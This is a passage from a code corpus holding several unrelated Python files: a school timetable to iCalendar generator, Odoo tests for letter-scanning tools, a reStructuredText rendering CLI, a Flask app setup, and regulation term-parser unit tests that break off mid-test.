''' Create icalendar entry for half a day
'''
day_data = a_day[1]
event = Event()
event.add('summary', 'Half Day')
event['location'] = 'BHS'
event.add('dtstart', day_data.date + reg)
event.add('dtend', day_data.date + reg + plus_half_a_day)
event['uid'] = 'Half' + str(a_day[0]) + str(day_data.date).replace(" ","-")
ical.add_component(event)
return ical
def add_special_day(ical, a_day):
''' Create icalendar entry for half a day
'''
day_data = a_day[1]
event = Event()
event.add('summary', day_data.special_day)
event['location'] = 'BHS'
event.add('dtstart', day_data.date + reg)
event.add('dtend', day_data.date + reg + plus_a_working_day)
event['uid'] = 'Special' + str(a_day[0]) + \
str(day_data.date).replace(" ", "-") + day_data.special_day
ical.add_component(event)
return ical
def add_PD_day(ical, a_day):
''' Create icalendar entry for half a day
'''
day_data = a_day[1]
event = Event()
event.add('summary', 'Professional Development')
event['location'] = 'BHS'
event.add('dtstart', day_data.date + l1)
event.add('dtend', day_data.date + l1 + plus_a_working_day)
event['uid'] = 'PD' + str(a_day[0]) + str(day_data.date).replace(" ", "-")
ical.add_component(event)
return ical
def add_statistics_string(day_data):
all_classes = get_list_of_unique_lessons(timetable_path_n_file)
dd = day_data
full_string = 'The following numbers show the lessons you will \
teach minus half-days, study leave, sports/art/steam days and final exams: \n\n'
for class_name in all_classes:
sub_string = class_name + ': %s days taught | %s days left \n' % \
(day_data.stats[class_name+'-done'], day_data.stats[class_name+'-left'])
full_string = full_string + sub_string
teaching_days ='\n %d days of teaching left, %d days of teaching done \n ' % \
(dd.stats['days_left_teaching'], dd.stats['days_taught'])
just_days = "%d days left 'til the summer! \n\n" % \
dd.stats['days_to_summer']
disclaimer = '''DISCLAIMER: You will have fewer lessons than
indicated due to the usual suspects:
Torch Day, Days out, trips, Y7 endeavour, etc.'''
full_string = full_string + teaching_days + just_days + disclaimer
return full_string
def short_statistics(day_data):
'''
A quick overview of statistics.
Called by PDF generator sandbox.py
'''
all_classes = get_list_of_unique_lessons(timetable_path_n_file)
dd = day_data
list_of_short_stats = []
for class_name in all_classes:
# if len(class_name.split(' ')) > 2:
# # if it is of the form 'Y11 Phy 6'
# sub_string = class_name.split(' ')[0] + \
# ' : %s / %s' % \
# (day_data.stats[class_name+'-done'], day_data.stats[class_name+'-left'])
# else:
# if it is of the form 'IB1'
sub_string = class_name.split(' ')[0]+ \
' : %s / %s' % \
(day_data.stats[class_name+'-done'], day_data.stats[class_name+'-left'])
list_of_short_stats.append(sub_string)
return list_of_short_stats
def add_teaching_day(ical, a_day):
''' Create icalendar entry for a normal day
'''
day_data = a_day[1]
day_nr_event = Event()
day_nr_event.add('summary', 'Day %s' % day_data.day_number)
stats_string = add_statistics_string(day_data)
day_nr_event.add('description', stats_string)
day_nr_event['location'] = 'BHS'
day_nr_event.add('dtstart', day_data.date + reg - plus_an_hour)
day_nr_event.add('dtend', day_data.date + reg - plus_half_an_hour)
day_nr_event['uid'] = 'dayNR' + str(a_day[0]) + \
str(day_data.date).replace(" ", "-")
ical.add_component(day_nr_event)
if day_data.L1: # maybe all lessons should have been refactored to a dict.
l1_event = Event()
l1_event.add('summary', day_data.L1)
l1_event['location'] = day_data.L1.split('@')[1]
l1_event.add('dtstart', day_data.date + l1)
l1_event.add('dtend', day_data.date + l1 + plus_a_lesson)
l1_event['uid'] = 'L1' + str(a_day[0]) + \
str(day_data.date).replace(" ", "-")
ical.add_component(l1_event)
if day_data.L2: # maybe all lessons should have been refactored to a dict.
l2_event = Event()
l2_event.add('summary', day_data.L2)
l2_event['location'] = day_data.L2.split('@')[1]
l2_event.add('dtstart', day_data.date + l2)
l2_event.add('dtend', day_data.date + l2 + plus_a_lesson)
l2_event['uid'] = 'L2' + str(a_day[0]) + \
str(day_data.date).replace(" ", "-")
ical.add_component(l2_event)
if day_data.L3: # maybe all lessons should have been refactored to a dict.
l3_event = Event()
l3_event.add('summary', day_data.L3)
l3_event['location'] = day_data.L3.split('@')[1]
l3_event.add('dtstart', day_data.date + l3)
l3_event.add('dtend', day_data.date + l3 + plus_a_lesson)
l3_event['uid'] = 'L3' + str(a_day[0]) + \
str(day_data.date).replace(" ", "-")
ical.add_component(l3_event)
if day_data.L4: # maybe all lessons should have been refactored to a dict.
l4_event = Event()
l4_event.add('summary', day_data.L4)
l4_event['location'] = day_data.L4.split('@')[1]
l4_event.add('dtstart', day_data.date + l4)
l4_event.add('dtend', day_data.date + l4 + plus_a_lesson)
l4_event['uid'] = 'L4' + str(a_day[0]) + \
str(day_data.date).replace(" ", "-")
ical.add_component(l4_event)
if day_data.L5: # maybe all lessons should have been refactored to a dict.
l5_event = Event()
l5_event.add('summary', day_data.L5)
l5_event['location'] = day_data.L5.split('@')[1]
l5_event.add('dtstart', day_data.date + l5)
l5_event.add('dtend', day_data.date + l5 + plus_a_lesson)
l5_event['uid'] = 'L5' + str(a_day[0]) + \
str(day_data.date).replace(" ", "-")
ical.add_component(l5_event)
if day_data.meeting:
meeting_event = Event()
meeting_event.add('summary', day_data.meeting + ' meeting')
meeting_event['location'] = 'Department/QEH'
meeting_event.add('dtstart', day_data.date + l5 + plus_a_lesson +
plus_a_registration)
meeting_event.add('dtend', day_data.date + l5 + plus_a_lesson +
plus_a_registration + plus_an_hour)
meeting_event['uid'] = day_data.meeting + str(a_day[0]) + \
str(day_data.date).replace(" ", "-")
ical.add_component(meeting_event)
leaves = [day_data.y7_leave, day_data.y8_leave, day_data.y9_leave,
day_data.y10_leave, day_data.y11_leave,
day_data.ib1_leave, day_data.ib2_leave]
leave_index = [i for i, x in enumerate(leaves) if x]
# This may need upgrading for other calendars
# 'Y789' has changed to 'Y7_leave', 'Y8_leave', 'Y9_leave'
# 0.5 in leave column means away for the morning.
leave_dict = {0: 'Y7 leave', 1: 'Y8 leave', 2: 'Y9 leave',
3: 'Y10 leave', 4: 'Y11 leave', 5: 'IB1 leave', 6: 'IB2 leave'}
leave_string = '| '.join([leave_dict[i] for i in leave_index])
if leave_string:
leave_note = Event()
leave_note.add('summary', leave_string)
leave_note.add('description', leave_string)
leave_note.add('dtstart', day_data.date + td(hours=6, minutes=20))
leave_note.add('dtend', day_data.date + td(hours=6, minutes=0) +
plus_a_lunch)
leave_note['uid'] = 'leaveInfo' + str(a_day[0]) + \
str(day_data.date).replace(" ", "-")
ical.add_component(leave_note)
return ical
def count_teaching_days(bhs_calendar):
''' goes through the dictionary containing
the objects for each date
and checks if it's a teaching day
incrementing the counter
'''
bhs_calendar_days_list = sorted(bhs_calendar.iteritems())
counter = 0
for a_day in bhs_calendar_days_list:
day_data = a_day[1]
if day_data.teaching_day:
counter += 1
return counter
def count_lesson_days(bhs_calendar, lesson_string,
adate=dt(2018, 8, 30), opt='left'):
''' goes through the dictionary containing
the objects for each date
and checks if there is a particular lesson that day
incrementing the counter. For ex:
Check for string 'IB2', discarding those days IB2s are on leave.
(start on a given date, fwd or backwards)
opt: can be left or done (days left or days already done)
'''
bhs_calendar_days_list = sorted(bhs_calendar.iteritems())
counter = 0
for a_day in bhs_calendar_days_list:
day_data = a_day[1]
leaves = [day_data.y7_leave, day_data.y8_leave, day_data.y9_leave,
day_data.y10_leave, day_data.y11_leave,
day_data.ib1_leave, day_data.ib2_leave]
leave_index = [i for i, x in enumerate(leaves) if x]
# 0.5 in leave column means away for the morning.
leave_dict = {0: 'Y7 leave', 1: 'Y8 leave', 2: 'Y9 leave',
3: 'Y10 leave', 4: 'Y11 leave', 5: 'IB1 leave', 6: 'IB2 leave'}
lesson_list = [day_data.L1, day_data.L2, day_data.L3, day_data.L4, day_data.L5]
if day_data.teaching_day:
is_that_lesson_today = len([s for s in lesson_list if lesson_string in s])
if is_that_lesson_today > 0:
# which classes are on leave?
are_on_leave = [leave_dict[ind] for ind in leave_index]
# we use short_lesson_string to find 'Y11' instead of 'Y11 Phy 6' or 'Y11 Phy 1'
short_lesson_string = lesson_string.split(' ')[0]
is_that_lesson_on_leave = len([s for s in are_on_leave
if short_lesson_string in s])
if is_that_lesson_on_leave > 0:
pass
else:
if opt == 'left' and day_data.date > adate:
counter += 1
if opt == 'left' and day_data.date < adate:
pass
if opt == 'done' and day_data.date > adate:
pass
if opt == 'done' and day_data.date < adate:
counter += 1
# if opt == 'left':
# print 'there are %s lessons left of %s' % (counter, lesson_string)
# if opt == 'done':
# print 'You have already taught %s lessons of %s' % (counter, lesson_string)
return counter
def get_list_of_unique_lessons(timetable_path_n_file):
'''
`input`: timetable_dict
`output`: unique lessons, for ex:
['IB1 Phys', 'IB2 D.tech', 'Y10 Phys 1', 'Lunch Duties',
'Y11 Phys 2', 'Y11 Phys 1', '9A Sc', 'IB2 Reg.']
'''
timetable = open(timetable_path_n_file, 'rb',)
tt_reader = csv.reader(timetable)
tt_headers = tt_reader.next()
timetable_dict = {}
for row in tt_reader:
timetable_dict[int(row[0])] = row[1:]
# timetable.close()
all_lessons = []
for i in timetable_dict:
all_lessons += timetable_dict[i]
regex = re.compile(ur'\@[\w\-]*', re.DOTALL)
lessons_without_location = [regex.sub('', lesson).strip() for lesson in all_lessons]
unique_lessons = list(set(lessons_without_location))
# remove empty lessons:
unique_lessons = [x for x in unique_lessons if x]
# Sort them before returning them:
sorted_unique_lessons = []
all_class_strings = ['7', '8', '9', '10', '11', 'IB1', 'IB2']
for sub_str in all_class_strings:
matching = [s for s in unique_lessons if sub_str in s]
if matching:
for match in matching:
sorted_unique_lessons.append(match)
return sorted_unique_lessons
'''
You have 11 days of teaching left (excluding half days, holidays, PD days)
and have taught 162 days so far
IB2 Phys: 59 LESSONS TAUGHT | 0 LESSONS LEFT
Y11-1: 62 LESSONS TAUGHT | 0 LESSONS LEFT
Y10-1: 50 LESSONS TAUGHT | 4 LESSONS LEFT
Y9 Sc: 104 LESSONS TAUGHT | 8 LESSONS LEFT
Y10-6: 76 LESSONS TAUGHT | 6 LESSONS LEFT
IB1 Phys: 76 LESSONS TAUGHT | 6 LESSONS LEFT
Y10C Reg.: 151 LESSONS TAUGHT | 12 LESSONS LEFT
{'Y11 Phy 6': 82, 'Y8A Sc': 111, 'Y11 Phy 1': 84, 'IB1': 125, 'IB2': 56, 'Y10 Phy 1': 55} # # #
This excludes study leave and exams.
DISCLAIMER: You may have fewer lessons than indicated
here due to the usual suspects: Torch Day, Days out, trips, etc.
'''
| alphydan/bhs-ical | new-bhs-cal/import_fun_and_stats.py | Python | gpl-2.0 | 13,512 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <ecino@compassion.ch>
#
# The licence is in the file __openerp__.py
#
##############################################################################
from .. import tools
from openerp.tests import common
import logging
import cv2
import numpy as np
import os
logger = logging.getLogger(__name__)
THIS_DIR = os.path.dirname(__file__)
class TestTools(common.TransactionCase):
"""
Tests all utility functions used for importing letters.
"""
def setUp(self):
super(TestTools, self).setUp()
self.test_document_normal = os.path.join(THIS_DIR,
'testdata/normal.png')
self.test_document_noise = os.path.join(THIS_DIR, 'testdata/noise.png')
self.test_document_white = os.path.join(THIS_DIR, 'testdata/white.png')
template_obj = self.env['correspondence.template']
self.templates = template_obj.search([('pattern_image', '!=', False)])
def test_blue_corner_finder_should_find(self):
"""
Blue corner should be found at known coordinates.
"""
img = self._read_img(self.test_document_normal)
blue_corner_position = self._blue_corner_position(img)
self.assertEqual(blue_corner_position, [2416, 76])
def test_blue_corner_finder_should_not_find(self):
"""
Blue corner should not be found.
"""
img = self._read_img(self.test_document_white)
blue_corner_position = self._blue_corner_position(img)
self.assertIsNone(blue_corner_position)
def test_pattern_recognition(self):
"""
Pattern should be recognized correctly.
"""
template, pattern_center = self._pattern_recognition(
self.test_document_normal)
self.assertIsNotNone(template)
self.assertEqual(template.name, 'Test Template 2')
np.testing.assert_allclose(pattern_center,
np.array([1273, 3301]),
atol=1)
def test_pattern_recognition_no_pattern(self):
"""
Pattern should not be found.
"""
template, _ = self._pattern_recognition(self.test_document_noise)
self.assertIsNone(template)
template, _ = self._pattern_recognition(self.test_document_white)
self.assertIsNone(template)
def test_zxing_read_qr_code(self):
"""
QR code should be read correctly.
"""
qr_code = self._qr_decode(self.test_document_normal)
self.assertIsNotNone(qr_code)
self.assertEqual(qr_code.data, '1512093XXDR1611115\n')
def test_zxing_no_qr_code(self):
"""
Should report error for document that does not contain QR code.
"""
qr_code = self._qr_decode(self.test_document_noise)
self.assertIsNone(qr_code)
qr_code = self._qr_decode(self.test_document_white)
self.assertIsNone(qr_code)
def test_check_box_reader(self):
"""
Checkboxes should be read correctly.
"""
# Load image that has the French and Italian box checked
img = self._read_img(self.test_document_normal)
# French
box = self._make_box(1260, 120)
self.assertTrue(self._checked_state(img[box]))
# Italian
box = self._make_box(1260, 200)
self.assertTrue(self._checked_state(img[box]))
# German
box = self._make_box(1260, 280)
self.assertFalse(self._checked_state(img[box]))
# Spanish
box = self._make_box(1700, 120)
self.assertFalse(self._checked_state(img[box]))
# English
box = self._make_box(1700, 200)
self.assertFalse(self._checked_state(img[box]))
# Other
box = self._make_box(1700, 280)
self.assertFalse(self._checked_state(img[box]))
def _read_img(self, path):
img = cv2.imread(path)
self.assertIsNotNone(img)
return img
def _pattern_recognition(self, path):
img = self._read_img(path)
# when the parameter test=False (default value)
# find_template returns a third parameter equals to None
return tools.patternrecognition.find_template(
img, self.templates, 0.3)[:2]
@staticmethod
def _qr_decode(path):
path = os.path.abspath(path)
bar_code_tool = tools.zxing_wrapper.BarCodeTool()
qr_code = bar_code_tool.decode(path, try_harder=True)
return qr_code
@staticmethod
def _blue_corner_position(img):
blue_corner_finder = tools.bluecornerfinder.BlueCornerFinder(img)
return blue_corner_finder.getIndices()
@staticmethod
def _make_box(x, y, size=50):
return [slice(y, y + size), slice(x, x + size)]
@staticmethod
def _checked_state(img):
checkbox_reader = tools.checkboxreader.CheckboxReader(img)
return checkbox_reader.getState()
| emgirardin/compassion-modules | sbc_compassion/tests/test_tools.py | Python | agpl-3.0 | 5,172 |
import argparse
import codecs
import locale
import sys
from . import render
locale.setlocale(locale.LC_ALL, "")
def main():
parser = argparse.ArgumentParser(description="renders reStructuredText")
parser.add_argument("source",
nargs="?",
help="file to open and render",
)
args = parser.parse_args()
if args.source:
with codecs.open(args.source, "r", "utf-8") as fp:
text = fp.read()
else:
text = sys.stdin.read()
rendered = render(text)
sys.stdout.write(rendered.encode("utf-8"))
sys.stdout.flush()
if __name__ == "__main__":
sys.exit(main())
| dstufft/recliner | recliner/__main__.py | Python | bsd-2-clause | 638 |
import os
import logging
from flask import Flask, abort, g
from config import config
from api_v1 import bp as api_v1_bp
from ui import bp as ui_bp
app = Flask(__name__)
app.config.from_object(config)
app.register_blueprint(api_v1_bp, url_prefix='/api/v1')
app.register_blueprint(ui_bp, url_path='/')
@app.before_first_request
def set_root_path():
root_path = app.config.get('root_path')
if not root_path:
root_path = os.path.dirname(app.root_path)
app.config['root_path'] = root_path
playbooks_path = app.config.get('playbooks_path')
if not playbooks_path:
playbooks_path = os.path.join(root_path, 'playbooks')
app.config['playbooks_path'] = playbooks_path
@app.before_first_request
def logger():
if not app.debug:
app.logger.addHandler(logging.StreamHandler())
app.logger.setLevel(logging.INFO)
@app.errorhandler(500)
def internal_server_error(e):
app.logger.exception(e)
return abort(500)
| sivel/sai | sai/__init__.py | Python | apache-2.0 | 978 |
# vim: set fileencoding=utf-8
from unittest import TestCase
from mock import patch
from regparser.layer.terms import ParentStack, Terms
from regparser.layer.def_finders import Ref
from regparser.tree.struct import Node
import settings
class LayerTermTest(TestCase):
def setUp(self):
self.original_ignores = settings.IGNORE_DEFINITIONS_IN
settings.IGNORE_DEFINITIONS_IN = {'ALL': []}
def tearDown(self):
settings.IGNORE_DEFINITIONS_IN = self.original_ignores
def test_is_exclusion(self):
"""There are certain indicators that a definition _should not_ be
considered the definition of that term. For example, exclusions to a
general definition should not replace the original. We can also
explicitly ignore chunks of text when finding definitions.."""
t = Terms(None)
n = Node('ex ex ex', label=['1111', '2'])
self.assertFalse(t.is_exclusion('ex', n))
t.scoped_terms = {('1111',): [Ref('abc', '1', 0)]}
self.assertFalse(t.is_exclusion('ex', n))
t.scoped_terms = {('1111',): [Ref('ex', '1', 0)]}
self.assertFalse(t.is_exclusion('ex', n))
n.text = u'Something something the term “ex” does not include potato'
self.assertTrue(t.is_exclusion('ex', n))
t.scoped_terms = {('1111',): [Ref('abc', '1', 0)]}
self.assertFalse(t.is_exclusion('ex', n))
settings.IGNORE_DEFINITIONS_IN['1111'] = ['phrase with abc in it']
self.assertFalse(t.is_exclusion('abc', n))
n.text = "Now the node has a phrase with abc in it, doesn't it?"
self.assertTrue(t.is_exclusion('abc', n))
def test_node_definitions_no_def(self):
"""Verify that none of the matchers match certain strings"""
t = Terms(None)
stack = ParentStack()
stack.add(0, Node(label=['999']))
stack.add(1, Node('Definitions', label=['999', '1']))
no_defs = ['This has no defs',
'Also has no terms',
'Still no terms, but',
'the next one does']
for txt in no_defs:
defs, exc = t.node_definitions(Node(txt), stack)
self.assertEqual([], defs)
self.assertEqual([], exc)
def test_node_defintions_act(self):
t = Terms(None)
stack = ParentStack()
stack.add(0, Node('Definitions', label=['9999']))
node = Node(u'“Act” means something else entirely')
included, excluded = t.node_definitions(node, stack)
self.assertEqual(1, len(included))
self.assertEqual([], excluded)
def test_node_definitions_needs_term(self):
t = Terms(None)
stack = ParentStack()
stack.add(0, Node('Definitions', label=['9999']))
node = Node(u"However, for purposes of rescission under §§ 1111.15 " +
u"and 1111.13, and for purposes of §§ 1111.12(a)(1), " +
u"and 1111.46(d)(4), the term means all calendar " +
u"days...")
self.assertEqual(([], []), t.node_definitions(node, stack))
def test_node_definitions_exclusion(self):
n1 = Node(u'“Bologna” is a type of deli meat', label=['111', '1'])
n2 = Node(u'Let us not forget that the term “bologna” does not ' +
'include turtle meat', label=['111', '1', 'a'])
t = Terms(Node(label=['111'], children=[n1, n2]))
t.pre_process()
stack = ParentStack()
stack.add(1, Node('Definitions'))
included, excluded = t.node_definitions(n1, stack)
self.assertEqual([Ref('bologna', '111-1', 1)], included)
self.assertEqual([], excluded)
t.scoped_terms[('111', '1')] = included
included, excluded = t.node_definitions(n2, stack)
self.assertEqual([], included)
self.assertEqual([Ref('bologna', '111-1-a', 33)], excluded)
def test_node_definitions_multiple_xml(self):
"""Find xml definitions which are separated by `and`"""
stack = ParentStack().add(0, Node(label=['9999']))
winter = Node("(4) Cold and dreary mean winter.", label=['9999', '4'])
winter.tagged_text = ('(4) <E T="03">Cold</E> and '
'<E T="03">dreary</E> mean winter.')
inc, _ = Terms(None).node_definitions(winter, stack)
self.assertEqual(len(inc), 2)
cold, dreary = inc
self.assertEqual(cold, Ref('cold', '9999-4', 4))
self.assertEqual(dreary, Ref('dreary', '9999-4', 13))
def test_node_definitions_xml_commas(self):
"""Find xml definitions which have commas separating them"""
stack = ParentStack().add(0, Node(label=['9999']))
summer = Node("(i) Hot, humid, or dry means summer.",
label=['9999', '4'])
summer.tagged_text = ('(i) <E T="03">Hot</E>, <E T="03">humid</E>, '
'or <E T="03">dry</E> means summer.')
inc, _ = Terms(None).node_definitions(summer, stack)
self.assertEqual(len(inc), 3)
hot, humid, dry = inc
self.assertEqual(hot, Ref('hot', '9999-4', 4))
self.assertEqual(humid, Ref('humid', '9999-4', 9))
self.assertEqual(dry, Ref('dry', '9999-4', 19))
def test_node_definitions_xml_or(self):
"""Find xml definitions which are separated by `or`"""
stack = ParentStack().add(0, Node(label=['9999']))
tamale = Node("(i) Hot tamale or tamale means nom nom",
label=['9999', '4'])
tamale.tagged_text = ('(i) <E T="03">Hot tamale</E> or <E T="03"> '
'tamale</E> means nom nom ')
inc, _ = Terms(None).node_definitions(tamale, stack)
self.assertEqual(len(inc), 2)
hot, tamale = inc
self.assertEqual(hot, Ref('hot tamale', '9999-4', 4))
self.assertEqual(tamale, Ref('tamale', '9999-4', 18))
def test_node_definitions_too_long(self):
"""Don't find definitions which are too long"""
stack = ParentStack().add(0, Node('Definitions', label=['9999']))
text = u"""“I declare under the penalties of perjury that this—(insert
type of document, such as, statement, application, request,
certificate), including the documents submitted in support thereof,
has been examined by me and, to the best of my knowledge and belief,
is true, correct, and complete.”"""
node = Node(u'```extract\n{}\n```'.format(text))
included, excluded = Terms(None).node_definitions(node, stack)
self.assertEqual([], included)
self.assertEqual([], excluded)
def test_pre_process(self):
noname_subpart = Node(
'',
label=['88', 'Subpart'],
node_type=Node.EMPTYPART,
children=[
Node(u"Definition. For the purposes of this part, " +
u"“abcd” is an alphabet", label=['88', '1'])])
xqxq_subpart = Node(
'',
title='Subpart XQXQ: The unreadable',
label=['88', 'Subpart', 'XQXQ'], node_type=Node.SUBPART,
children=[
Node(label=['88', '2'], children=[
Node(label=['88', '2', 'a'],
text="Definitions come later for the purposes of " +
"this section ",
children=[
Node(u"“AXAX” means axe-cop",
label=['88', '2', 'a', '1'])]),
Node(label=['88', '2', 'b'], children=[
Node(label=['88', '2', 'b', 'i'], children=[
Node(label=['88', '2', 'b', 'i', 'A'],
text=u"Definition. “Awesome sauce” means " +
"great for the purposes of this " +
"paragraph",)])])])])
tree = Node(label=['88'], children=[noname_subpart, xqxq_subpart])
t = Terms(tree)
t.pre_process()
self.assertTrue(('88',) in t.scoped_terms)
self.assertEqual([Ref('abcd', '88-1', 44)],
t.scoped_terms[('88',)])
self.assertTrue(('88', '2') in t.scoped_terms)
self.assertEqual([Ref('axax', '88-2-a-1', 1)],
t.scoped_terms[('88', '2')])
self.assertTrue(('88', '2', 'b', 'i', 'A') in t.scoped_terms)
self.assertEqual([Ref('awesome sauce', '88-2-b-i-A', 13)],
t.scoped_terms[('88', '2', 'b', 'i', 'A')])
# Check subparts are correct
self.assertEqual({None: ['1'], 'XQXQ': ['2']},
dict(t.scope_finder.subpart_map))
# Finally, make sure the references are added
referenced = t.layer['referenced']
self.assertTrue('abcd:88-1' in referenced)
self.assertEqual('abcd', referenced['abcd:88-1']['term'])
self.assertEqual('88-1', referenced['abcd:88-1']['reference'])
self.assertEqual((44, 48), referenced['abcd:88-1']['position'])
self.assertTrue('axax:88-2-a-1' in referenced)
self.assertEqual('axax', referenced['axax:88-2-a-1']['term'])
self.assertEqual('88-2-a-1', referenced['axax:88-2-a-1']['reference'])
self.assertEqual((1, 5), referenced['axax:88-2-a-1']['position'])
self.assertTrue('awesome sauce:88-2-b-i-A' in referenced)
self.assertEqual('awesome sauce',
referenced['awesome sauce:88-2-b-i-A']['term'])
self.assertEqual('88-2-b-i-A',
referenced['awesome sauce:88-2-b-i-A']['reference'])
self.assertEqual((13, 26),
referenced['awesome sauce:88-2-b-i-A']['position'])
def test_pre_process_defined_twice(self):
tree = Node(u"The term “lol” means laugh out loud. " +
u"How do you pronounce “lol”, though?",
label=['1212', '5'])
t = Terms(tree)
t.pre_process()
self.assertEqual(t.layer['referenced']['lol:1212-5']['position'],
(10, 13))
def test_pre_process_subpart(self):
root = Node(label=['1212'])
subpartA = Node(label=['1212', 'Subpart', 'A'], title='Subpart A')
section2 = Node(label=['1212', '2'], title='1212.2')
def1 = Node(u"“totes” means in total", label=['1212', '2', 'a'])
subpartB = Node(label=['1212', 'Subpart', 'B'], title='Subpart B')
section22 = Node("\nFor the purposes of this subpart",
label=['1212', '22'], title='1212.22')
def2 = Node(u"“totes” means in extremely", label=['1212', '22', 'a'])
root.children = [subpartA, subpartB]
subpartA.children, subpartB.children = [section2], [section22]
section2.children, section22.children = [def1], [def2]
t = Terms(root)
t.pre_process()
self.assertTrue(('1212',) in t.scoped_terms)
self.assertEqual(len(t.scoped_terms[('1212',)]), 1)
self.assertEqual('1212-2-a', t.scoped_terms[('1212',)][0].label)
self.assertTrue(('1212', '22') in t.scoped_terms)
self.assertEqual(len(t.scoped_terms[('1212', '22')]), 1)
self.assertEqual('1212-22-a', t.scoped_terms[('1212', '22')][0].label)
@patch.object(Terms, 'node_definitions')
def test_look_for_defs(self, node_definitions):
"""We should be walking through the tree to find terms. Test this by
documenting which nodes are touched. We should be _ignoring_ certain
subtrees (notable, any which aren't associated w/ regtext)"""
node_definitions.side_effect = lambda n, _: ([], [n.label_id()])
t = Terms(None)
root = Node(label=['111'], children=[
Node(label=['111', 'Subpart'], node_type=Node.EMPTYPART, children=[
Node(label=['111', '1'], children=[
Node(label=['111', '1', 'a']),
Node(label=['111', '1', 'b']),
Node(label=['111', '1', 'c'])]),
Node(label=['111', '2'], children=[
Node(label=['111', '2', 'p1'], node_type=Node.EXTRACT,
children=[Node(label=['111', '2', 'p1', 'p1'])])
])]),
Node(label=['111', 'A'], node_type=Node.APPENDIX, children=[
Node(label=['111', 'A', '1'], node_type=Node.APPENDIX)])])
t.look_for_defs(root)
self.assertItemsEqual(
t.scoped_terms['EXCLUDED'],
# note the absence of APPENDIX, and anything below an EXTRACT
['111', '111-Subpart', '111-1', '111-1-a', '111-1-b', '111-1-c',
'111-2'])
def test_excluded_offsets(self):
t = Terms(None)
t.scoped_terms['_'] = [
Ref('term', 'lablab', 4), Ref('other', 'lablab', 8),
Ref('more', 'nonnon', 1)
]
self.assertEqual(
[(4, 8), (8, 13)],
t.excluded_offsets(Node('Some text', label=['lablab'])))
self.assertEqual(
[(1, 5)],
t.excluded_offsets(Node('Other', label=['nonnon'])))
self.assertEqual(
[],
t.excluded_offsets(Node('Ab ab ab', label=['ababab'])))
def test_excluded_offsets_blacklist(self):
t = Terms(None)
t.scoped_terms['_'] = [Ref('bourgeois', '12-Q-2', 0)]
settings.IGNORE_DEFINITIONS_IN['ALL'] = ['bourgeois pig']
excluded = t.excluded_offsets(Node('You are a bourgeois pig!',
label=['12', '3']))
self.assertEqual([(10, 23)], excluded)
def test_excluded_offsets_blacklist_per_reg(self):
t = Terms(None)
t.scoped_terms['_'] = [
Ref('bourgeois', '12-Q-2', 0),
Ref('consumer', '12-Q-3', 0)]
settings.IGNORE_DEFINITIONS_IN['ALL'] = ['bourgeois pig']
settings.IGNORE_DEFINITIONS_IN['12'] = ['consumer price index']
excluded = t.excluded_offsets(
Node('There is a consumer price index', label=['12', '2']))
self.assertEqual([(11, 31)], excluded)
def test_excluded_offsets_blacklist_word_boundaries(self):
"""If an exclusion begins/ends with word characters, the searching
regex should make sure to only match on word boundaries"""
settings.IGNORE_DEFINITIONS_IN['ALL'] = ['shed act', '(phrase)']
t = Terms(None)
t.scoped_terms['_'] = [Ref('act', '28-6-d', 0)]
excluded = t.excluded_offsets(Node("That's a watershed act",
label=['28', '9']))
self.assertEqual([], excluded)
excluded = t.excluded_offsets(Node("This has a '(phrase)' in it",
label=['28', '9']))
self.assertNotEqual([], excluded)
def test_calculate_offsets(self):
applicable_terms = [('rock band', 'a'), ('band', 'b'), ('drum', 'c'),
('other thing', 'd')]
text = "I am in a rock band. That's a band with a drum, a rock drum."
t = Terms(None)
matches = t.calculate_offsets(text, applicable_terms)
self.assertItemsEqual(matches, [
('rock band', 'a', [(10, 19)]),
('band', 'b', [(30, 34)]),
('drum', 'c', [(42, 46), (55, 59)])])
def test_calculate_offsets_pluralized1(self):
applicable_terms = [('rock band', 'a'), ('band', 'b'), ('drum', 'c'),
('other thing', 'd')]
text = "I am in a rock band. That's a band with a drum, a rock drum."
text += " Many bands. "
t = Terms(None)
matches = t.calculate_offsets(text, applicable_terms)
self.assertItemsEqual(matches, [
('rock band', 'a', [(10, 19)]),
('band', 'b', [(30, 34)]),
('bands', 'b', [(66, 71)]),
('drum', 'c', [(42, 46), (55, 59)])])
def test_calculate_offsets_pluralized2(self):
applicable_terms = [('activity', 'a'), ('other thing', 'd')]
text = "activity, activities."
t = Terms(None)
matches = t.calculate_offsets(text, applicable_terms)
self.assertEqual(2, len(matches))
def test_calculate_offsets_singularized(self):
applicable_terms = [('activities', 'a'), ('other thing', 'd')]
text = "activity, activities."
t = Terms(None)
matches = t.calculate_offsets(text, applicable_terms)
self.assertEqual(2, len(matches))
def test_calculate_offsets_lexical_container(self):
applicable_terms = [('access device', 'a'), ('device', 'd')]
text = "This access device is fantastic!"
t = Terms(None)
matches = t.calculate_offsets(text, applicable_terms)
self.assertEqual(1, len(matches))
_, ref, offsets = matches[0]
self.assertEqual('a', ref)
self.assertEqual([(5, 18)], offsets)
def test_calculate_offsets_overlap(self):
applicable_terms = [('mad cow disease', 'mc'), ('goes mad', 'gm')]
text = 'There goes mad cow disease'
t = Terms(None)
matches = t.calculate_offsets(text, applicable_terms)
self.assertEqual(1, len(matches))
_, ref, offsets = matches[0]
self.assertEqual('mc', ref)
self.assertEqual('mad cow disease', text[offsets[0][0]:offsets[0][1]])
def test_calculate_offsets_word_part(self):
"""If a defined term is part of another word, don't include it"""
applicable_terms = [('act', 'a')]
text = "I am about to act on this transaction."
t = Terms(None)
matches = t.calculate_offsets(text, applicable_terms)
self.assertEqual(1, len(matches))
self.assertEqual(1, len(matches[0][2]))
def test_calculate_offsets_exclusions(self):
applicable_terms = [('act', 'a')]
text = "This text defines the 'fudge act'"
t = Terms(None)
self.assertEqual(
[], t.calculate_offsets(text, applicable_terms, [(23, 32)]))
self.assertEqual(
[('act', 'a', [(29, 32)])],
t.calculate_offsets(text, applicable_terms, [(1, 5)]))
def test_process(self):
"""The process() method should both find terms in the requested node
and order them by term name"""
t = Terms(Node(children=[
Node("ABC5", children=[Node("child")], label=['ref1']),
Node("AABBCC5", label=['ref2']),
Node("ABC3", label=['ref3']),
Node("AAA3", label=['ref4']),
Node("ABCABC3", label=['ref5']),
Node("ABCOTHER", label=['ref6']),
Node("ZZZOTHER", label=['ref7']),
]))
t.scoped_terms = {
("101", "22", "b", "2", "ii"): [
Ref("abc", "ref1", 1),
Ref("aabbcc", "ref2", 2)],
("101", "22", "b"): [
Ref("abc", "ref3", 3),
Ref("aaa", "ref4", 4),
